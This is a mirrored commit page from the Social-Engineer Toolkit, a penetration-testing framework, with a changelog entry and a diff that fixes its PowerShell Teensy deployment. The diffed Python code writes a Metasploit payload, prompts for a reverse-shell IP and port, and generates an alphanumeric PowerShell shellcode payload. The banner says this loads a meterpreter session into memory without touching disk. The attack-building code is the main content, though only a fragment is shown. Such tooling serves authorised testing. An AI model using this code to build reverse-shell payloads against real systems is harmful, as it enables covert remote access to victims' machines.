mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-04-04 14:56:08 +00:00
fixed teensy deployment
This commit is contained in:
parent
0f91c79614
commit
4057962906
2 changed files with 10 additions and 2 deletions
|
@ -4,6 +4,7 @@ version 6.5.2
|
|||
|
||||
* added smallest payload option for msfvenom shellcode creation
|
||||
* added automatic start of apache on hta attack
|
||||
* fixed powershell teensy deployment
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 6.5.1
|
||||
|
|
|
@ -1,6 +1,7 @@
|
|||
#!/usr/bin/python
|
||||
import pexpect
|
||||
from src.core.setcore import *
|
||||
import time
|
||||
|
||||
print """
|
||||
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.
|
||||
|
@ -16,10 +17,16 @@ filewrite = file(setdir + "/metasploit.payload", "w")
|
|||
filewrite.write(payload)
|
||||
filewrite.close()
|
||||
|
||||
import src.payloads.powershell.prep
|
||||
ipaddr = raw_input("Enter the IP for the reverse: ")
|
||||
port = raw_input("Enter the port for the reverse: ")
|
||||
|
||||
shellcode = generate_powershell_alphanumeric_payload(payload,ipaddr,port, "")
|
||||
filewrite = file(setdir + "/x86.powershell", "w")
|
||||
filewrite.write(shellcode)
|
||||
filewrite.close()
|
||||
|
||||
time.sleep(3)
|
||||
fileopen = file(setdir + "/x86.powershell", "r")
|
||||
#payload_encoded = fileopen.read()
|
||||
|
||||
# read in x amount of bytes
|
||||
data_read = int(50)
|
||||
|
|
Loading…
Add table
Reference in a new issue